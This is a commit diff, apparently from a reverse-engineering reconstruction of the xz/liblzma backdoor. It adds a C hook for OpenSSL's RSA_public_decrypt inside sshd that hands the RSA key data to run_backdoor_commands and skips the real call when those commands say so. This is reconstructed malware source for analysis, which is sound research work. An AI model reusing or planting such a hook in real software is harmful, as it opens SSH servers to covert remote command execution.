xzre_code: add hook_RSA_public_decrypt

xzre.h

@@ -3873,7 +3873,14 @@ extern BOOL count_pointers(
  * @param cmd_flags flags controlling the log hook configuration
  * @param ctx the global context
  */
-BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+extern BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+
+/**
+ * @brief hook for RSA_public_decrypt, which triggers @see run_backdoor_commands
+ */
+extern int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding);
 
 /**
  * @brief calls `sshlogv` from openssh, similarly to `sshlog` in openssh

xzre_code/CMakeLists.txt

@@ -1,6 +1,6 @@
 add_library(xzre_code
 	backdoor_entry.c
-  c_memmove.c
+  	c_memmove.c
 	c_strlen.c
 	c_strnlen.c
 	chacha_decrypt.c
@@ -12,6 +12,7 @@ add_library(xzre_code
 	find_call_instruction.c
 	find_lea_instruction.c
 	find_string_reference.c
+	hook_RSA_public_decrypt.c
 	is_endbr64_instruction.c
 	init_elf_entry_ctx.c
 	fake_lzma_alloc.c

xzre_code/hook_RSA_public_decrypt.c

@@ -0,0 +1,24 @@
+/**
+ * Copyright (C) 2024 Stefano Moioli <[email protected]>
+ **/
+#include "xzre.h"
+
+int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding
+){
+	pfn_RSA_public_decrypt_t RSA_public_decrypt;
+
+	if(!global_ctx) return 0;
+	if(!global_ctx->imported_funcs) return 0;
+	if(!(RSA_public_decrypt=global_ctx->imported_funcs->RSA_public_decrypt)) return 0;
+	if(!rsa){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	BOOL call_orig = TRUE;
+	int result = run_backdoor_commands(rsa, global_ctx, &call_orig);
+	if(call_orig){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	return result;
+}